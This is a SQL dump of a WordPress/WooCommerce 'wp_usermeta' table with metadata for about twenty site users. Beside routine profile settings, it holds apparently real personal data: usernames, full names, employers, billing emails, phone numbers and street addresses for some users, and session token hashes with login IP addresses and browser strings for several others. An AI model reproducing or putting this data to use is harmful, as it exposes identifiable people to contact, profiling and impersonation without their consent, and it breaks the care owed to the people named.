INSERT INTO `wp_usermeta` VALUES (15817, 1042, 'session_tokens', 'a:1:{s:64:"7732ea9665f97b9e7013ede8580e186b8fd6ee8d1a68c0a2a09d6e1207f14477";a:4:{s:10:"expiration";i:1496154313;s:2:"ip";s:14:"103.252.200.10";s:2:"ua";s:115:"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1494944713;}}'); 
INSERT INTO `wp_usermeta` VALUES (15818, 1043, 'nickname', 'sds1'); 
INSERT INTO `wp_usermeta` VALUES (15819, 1043, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15820, 1043, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15821, 1043, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15822, 1043, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15823, 1043, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15824, 1043, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15825, 1043, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15826, 1043, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15827, 1043, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15828, 1043, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15829, 1043, '_yoast_wpseo_profile_updated', '1494946024'); 
INSERT INTO `wp_usermeta` VALUES (15830, 1043, 'session_tokens', 'a:1:{s:64:"d6a869dd02561b22d3f02f0e32e362f20e7ae965ae84f86139e72c50475c37b6";a:4:{s:10:"expiration";i:1496155632;s:2:"ip";s:14:"209.160.200.35";s:2:"ua";s:108:"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.75 Safari/537.36";s:5:"login";i:1494946032;}}'); 
INSERT INTO `wp_usermeta` VALUES (15831, 1044, 'nickname', 'mjrmichael1979'); 
INSERT INTO `wp_usermeta` VALUES (15832, 1044, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15833, 1044, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15834, 1044, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15835, 1044, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15836, 1044, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15837, 1044, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15838, 1044, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15839, 1044, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15840, 1044, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15841, 1044, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15842, 1044, '_yoast_wpseo_profile_updated', '1494946379'); 
INSERT INTO `wp_usermeta` VALUES (15843, 1044, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15844, 1045, 'nickname', 'tomc'); 
INSERT INTO `wp_usermeta` VALUES (15845, 1045, 'first_name', 'Tom'); 
INSERT INTO `wp_usermeta` VALUES (15846, 1045, 'last_name', 'Cypranowski'); 
INSERT INTO `wp_usermeta` VALUES (15847, 1045, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15848, 1045, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15849, 1045, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15850, 1045, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15851, 1045, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15852, 1045, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15853, 1045, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15854, 1045, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15855, 1045, '_yoast_wpseo_profile_updated', '1494949164'); 
INSERT INTO `wp_usermeta` VALUES (15856, 1045, 'session_tokens', 'a:1:{s:64:"5f65ac0f8cb2ddf22dc2774c25929bd3c3f550df614eac8d21e79d338dcc76d9";a:4:{s:10:"expiration";i:1500046051;s:2:"ip";s:13:"130.76.96.149";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1499873251;}}'); 
INSERT INTO `wp_usermeta` VALUES (15857, 1045, 'last_update', '1494949214'); 
INSERT INTO `wp_usermeta` VALUES (15858, 1045, 'billing_first_name', 'Tom'); 
INSERT INTO `wp_usermeta` VALUES (15859, 1045, 'billing_last_name', 'Cypranowski'); 
INSERT INTO `wp_usermeta` VALUES (15860, 1045, 'billing_company', 'Detailers & More, Inc.'); 
INSERT INTO `wp_usermeta` VALUES (15861, 1045, 'billing_email', 'tomc@detailersandmore.com'); 
INSERT INTO `wp_usermeta` VALUES (15862, 1045, 'billing_phone', '630 222 6002'); 
INSERT INTO `wp_usermeta` VALUES (15863, 1045, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (15864, 1045, 'billing_address_1', '1939 Wentzville Pkwy'); 
INSERT INTO `wp_usermeta` VALUES (15865, 1045, 'billing_address_2', '# 335'); 
INSERT INTO `wp_usermeta` VALUES (15866, 1045, 'billing_city', 'Wentzville'); 
INSERT INTO `wp_usermeta` VALUES (15867, 1045, 'billing_state', 'MO'); 
INSERT INTO `wp_usermeta` VALUES (15868, 1045, 'billing_postcode', '63385'); 
INSERT INTO `wp_usermeta` VALUES (15869, 1045, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (15870, 1046, 'nickname', 'sharklerode2009'); 
INSERT INTO `wp_usermeta` VALUES (15871, 1046, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15872, 1046, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15873, 1046, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15874, 1046, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15875, 1046, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15876, 1046, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15877, 1046, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15878, 1046, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15879, 1046, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15880, 1046, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15881, 1046, '_yoast_wpseo_profile_updated', '1494951335'); 
INSERT INTO `wp_usermeta` VALUES (15882, 1046, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15883, 1047, 'nickname', 'mandyc1111977'); 
INSERT INTO `wp_usermeta` VALUES (15884, 1047, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15885, 1047, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15886, 1047, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15887, 1047, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15888, 1047, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15889, 1047, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15890, 1047, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15891, 1047, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15892, 1047, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15893, 1047, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15894, 1047, '_yoast_wpseo_profile_updated', '1494962341'); 
INSERT INTO `wp_usermeta` VALUES (15895, 1047, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15896, 1048, 'nickname', 'chris7686931992'); 
INSERT INTO `wp_usermeta` VALUES (15897, 1048, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15898, 1048, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15899, 1048, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15900, 1048, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15901, 1048, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15902, 1048, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15903, 1048, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15904, 1048, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15905, 1048, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15906, 1048, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15907, 1048, '_yoast_wpseo_profile_updated', '1494971605'); 
INSERT INTO `wp_usermeta` VALUES (15908, 1048, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15909, 1049, 'nickname', 'sls04192010'); 
INSERT INTO `wp_usermeta` VALUES (15910, 1049, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15911, 1049, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15912, 1049, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15913, 1049, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15914, 1049, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15915, 1049, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15916, 1049, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15917, 1049, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15918, 1049, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15919, 1049, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15920, 1049, '_yoast_wpseo_profile_updated', '1494986286'); 
INSERT INTO `wp_usermeta` VALUES (15921, 1049, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15922, 1050, 'nickname', 'STELLA.CHAN'); 
INSERT INTO `wp_usermeta` VALUES (15923, 1050, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15924, 1050, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15925, 1050, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15926, 1050, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15927, 1050, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15928, 1050, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15929, 1050, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15930, 1050, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15931, 1050, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15932, 1050, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15933, 1050, '_yoast_wpseo_profile_updated', '1494993392'); 
INSERT INTO `wp_usermeta` VALUES (15934, 1050, 'session_tokens', 'a:1:{s:64:"eb54fee027ffcd70fe4a7b3a3e956a788dbb16e841bd697f4a491e72b8f97dac";a:4:{s:10:"expiration";i:1496203001;s:2:"ip";s:13:"64.60.197.211";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1494993401;}}'); 
INSERT INTO `wp_usermeta` VALUES (15935, 1051, 'nickname', 'evanianetto1959'); 
INSERT INTO `wp_usermeta` VALUES (15936, 1051, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15937, 1051, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15938, 1051, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15939, 1051, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15940, 1051, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15941, 1051, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15942, 1051, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15943, 1051, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15944, 1051, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15945, 1051, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15946, 1051, '_yoast_wpseo_profile_updated', '1494995167'); 
INSERT INTO `wp_usermeta` VALUES (15947, 1051, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15948, 1052, 'nickname', 'wtkerk'); 
INSERT INTO `wp_usermeta` VALUES (15949, 1052, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15950, 1052, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15951, 1052, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15952, 1052, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15953, 1052, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15954, 1052, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15955, 1052, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15956, 1052, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15957, 1052, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15958, 1052, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15959, 1052, '_yoast_wpseo_profile_updated', '1495011793'); 
INSERT INTO `wp_usermeta` VALUES (15961, 1052, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (15962, 1053, 'nickname', 'caseyhadley1997'); 
INSERT INTO `wp_usermeta` VALUES (15963, 1053, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15964, 1053, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15965, 1053, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15966, 1053, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15967, 1053, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15968, 1053, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15969, 1053, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15970, 1053, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15971, 1053, 'wp_capabilities', 'a:1:{s:10:"subscriber";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15972, 1053, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15973, 1053, '_yoast_wpseo_profile_updated', '1495017896'); 
INSERT INTO `wp_usermeta` VALUES (15974, 1053, 'default_password_nag', '1'); 
INSERT INTO `wp_usermeta` VALUES (15975, 26, 'session_tokens', 'a:1:{s:64:"db2c18d5a8327e79fadb9a0623147ddbf804fa35cbee8cd5deafb3843ba67af1";a:4:{s:10:"expiration";i:1503194800;s:2:"ip";s:15:"180.191.131.116";s:2:"ua";s:109:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.6.2924.87 Safari/537.36";s:5:"login";i:1503022000;}}'); 
INSERT INTO `wp_usermeta` VALUES (15976, 1054, 'nickname', 'robert.warren'); 
INSERT INTO `wp_usermeta` VALUES (15977, 1054, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15978, 1054, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15979, 1054, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15980, 1054, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15981, 1054, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15982, 1054, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15983, 1054, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15984, 1054, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15985, 1054, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15986, 1054, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (15987, 1054, '_yoast_wpseo_profile_updated', '1495029841'); 
INSERT INTO `wp_usermeta` VALUES (15988, 1054, 'session_tokens', 'a:1:{s:64:"cb184625c8a4d4aa7a2f99ce3dd6472fcefaf860f408614d3607b4eeb6ac2635";a:4:{s:10:"expiration";i:1496239456;s:2:"ip";s:15:"209.221.240.193";s:2:"ua";s:113:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0; Firefox 45.9.0 - 111212-1500630306-1.37";s:5:"login";i:1495029856;}}'); 
INSERT INTO `wp_usermeta` VALUES (15989, 1055, 'nickname', 'schesser'); 
INSERT INTO `wp_usermeta` VALUES (15990, 1055, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15991, 1055, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (15992, 1055, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (15993, 1055, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15994, 1055, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (15995, 1055, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (15996, 1055, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (15997, 1055, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (15998, 1055, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (15999, 1055, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16000, 1055, '_yoast_wpseo_profile_updated', '1495038156'); 
INSERT INTO `wp_usermeta` VALUES (16001, 1055, 'session_tokens', 'a:1:{s:64:"7b35742f9b5c76d7784949f883832abf0dcddb9ba541a038d1d67f14e02e0889";a:4:{s:10:"expiration";i:1496247765;s:2:"ip";s:13:"66.83.192.102";s:2:"ua";s:114:"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1495038165;}}'); 
INSERT INTO `wp_usermeta` VALUES (16002, 1056, 'nickname', 'Alejandro.loza'); 
INSERT INTO `wp_usermeta` VALUES (16003, 1056, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16004, 1056, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16005, 1056, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16006, 1056, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16007, 1056, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16008, 1056, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16009, 1056, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16010, 1056, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16011, 1056, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16012, 1056, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16013, 1056, '_yoast_wpseo_profile_updated', '1495039033'); 
INSERT INTO `wp_usermeta` VALUES (16014, 1056, 'session_tokens', 'a:1:{s:64:"bc8a3dd3d0eaa27efc9b99d028f7d3a37c238109d74517819141806d2b18933a";a:4:{s:10:"expiration";i:1496248642;s:2:"ip";s:14:"158.116.144.20";s:2:"ua";s:110:"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36";s:5:"login";i:1495039042;}}'); 
INSERT INTO `wp_usermeta` VALUES (16015, 1056, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (16016, 1057, 'nickname', 'carol.read'); 
INSERT INTO `wp_usermeta` VALUES (16017, 1057, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16018, 1057, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16019, 1057, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16020, 1057, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16021, 1057, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16022, 1057, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16023, 1057, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16024, 1057, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16025, 1057, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16026, 1057, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16027, 1057, '_yoast_wpseo_profile_updated', '1495041202'); 
INSERT INTO `wp_usermeta` VALUES (16028, 1057, 'session_tokens', 'a:1:{s:64:"dfefb280c89ca9e73170d1ae64c2a786e3e0ba9dc788cbc0a20b74b43462788f";a:4:{s:10:"expiration";i:1496250811;s:2:"ip";s:12:"206.208.38.2";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1495041211;}}'); 
INSERT INTO `wp_usermeta` VALUES (16029, 1058, 'nickname', 'Lauren.hilbun'); 
INSERT INTO `wp_usermeta` VALUES (16030, 1058, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16031, 1058, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16032, 1058, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16033, 1058, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16034, 1058, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16035, 1058, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16036, 1058, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16037, 1058, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16038, 1058, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16039, 1058, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16040, 1058, '_yoast_wpseo_profile_updated', '1495043419'); 
INSERT INTO `wp_usermeta` VALUES (16041, 1058, 'session_tokens', 'a:1:{s:64:"11a3e84c66689a47cda0ed5dd02896c81e72485a9f9653816b631a9cf4c9861e";a:4:{s:10:"expiration";i:1496253030;s:2:"ip";s:15:"104.129.194.127";s:2:"ua";s:73:"Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1495043430;}}'); 
INSERT INTO `wp_usermeta` VALUES (16042, 1058, 'billing_first_name', 'Lauren'); 
INSERT INTO `wp_usermeta` VALUES (16043, 1058, 'billing_last_name', 'Hilbun'); 
INSERT INTO `wp_usermeta` VALUES (16044, 1058, 'billing_company', 'DRS Technologies'); 
INSERT INTO `wp_usermeta` VALUES (16045, 1058, 'billing_email', 'lauren.hilbun@drs.com'); 
INSERT INTO `wp_usermeta` VALUES (16046, 1058, 'billing_phone', '757-819-0700'); 
INSERT INTO `wp_usermeta` VALUES (16047, 1058, 'billing_country', 'US'); 
INSERT INTO `wp_usermeta` VALUES (16048, 1058, 'billing_address_1', '825 Greenbrier Circle'); 
INSERT INTO `wp_usermeta` VALUES (16049, 1058, 'billing_address_2', 'Suite M'); 
INSERT INTO `wp_usermeta` VALUES (16050, 1058, 'billing_city', 'Chesapeake'); 
INSERT INTO `wp_usermeta` VALUES (16051, 1058, 'billing_state', 'VA'); 
INSERT INTO `wp_usermeta` VALUES (16052, 1058, 'billing_postcode', '23320'); 
INSERT INTO `wp_usermeta` VALUES (16053, 1059, 'nickname', 'msdscentre'); 
INSERT INTO `wp_usermeta` VALUES (16054, 1059, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16055, 1059, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16056, 1059, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16057, 1059, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16058, 1059, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16059, 1059, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16060, 1059, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16061, 1059, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16062, 1059, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16063, 1059, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16064, 1059, '_yoast_wpseo_profile_updated', '1495046494'); 
INSERT INTO `wp_usermeta` VALUES (16065, 1059, 'session_tokens', 'a:1:{s:64:"f28a8da498bae68c911d86abf761609ec398780bc5d623bdf71485a2fb26fe54";a:4:{s:10:"expiration";i:1496256101;s:2:"ip";s:12:"192.75.48.13";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1495046501;}}'); 
INSERT INTO `wp_usermeta` VALUES (16066, 1060, 'nickname', 'Hstephens-fay'); 
INSERT INTO `wp_usermeta` VALUES (16067, 1060, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16068, 1060, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16069, 1060, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16070, 1060, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16071, 1060, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16072, 1060, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16073, 1060, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16074, 1060, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16075, 1060, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16076, 1060, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16077, 1060, '_yoast_wpseo_profile_updated', '1495049998'); 
INSERT INTO `wp_usermeta` VALUES (16078, 1060, 'session_tokens', 'a:1:{s:64:"9893c16e1f58d0b32acb0ce19ca8cb4d5219afb80c3ba4f2f090b672bc7384e9";a:4:{s:10:"expiration";i:1496259607;s:2:"ip";s:14:"50.241.110.201";s:2:"ua";s:72:"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0";s:5:"login";i:1495050007;}}'); 
INSERT INTO `wp_usermeta` VALUES (16079, 1060, 'manageedit-shop_ordercolumnshidden', 'a:1:{i:0;s:15:"billing_address";}'); 
INSERT INTO `wp_usermeta` VALUES (16080, 1061, 'nickname', 'cathy.barnes1'); 
INSERT INTO `wp_usermeta` VALUES (16081, 1061, 'first_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16082, 1061, 'last_name', ''); 
INSERT INTO `wp_usermeta` VALUES (16083, 1061, 'description', ''); 
INSERT INTO `wp_usermeta` VALUES (16084, 1061, 'rich_editing', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16085, 1061, 'comment_shortcuts', 'false'); 
INSERT INTO `wp_usermeta` VALUES (16086, 1061, 'admin_color', 'fresh'); 
INSERT INTO `wp_usermeta` VALUES (16087, 1061, 'use_ssl', '0'); 
INSERT INTO `wp_usermeta` VALUES (16088, 1061, 'show_admin_bar_front', 'true'); 
INSERT INTO `wp_usermeta` VALUES (16089, 1061, 'wp_capabilities', 'a:1:{s:8:"customer";b:1;}'); 
INSERT INTO `wp_usermeta` VALUES (16090, 1061, 'wp_user_level', '0'); 
INSERT INTO `wp_usermeta` VALUES (16091, 1061, '_yoast_wpseo_profile_updated', '1495058421'); 
INSERT INTO `wp_usermeta` VALUES (16092, 1061, 'session_tokens', 'a:1:{s:64:"c19331b24391ab043eba0d684a06e10985cbb2a897af5cbfea5be25ee9b9851a";a:4:{s:10:"expiration";i:1496268029;s:2:"ip";s:14:"128.170.224.10";s:2:"ua";s:68:"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";s:5:"login";i:1495058429;}}'); 
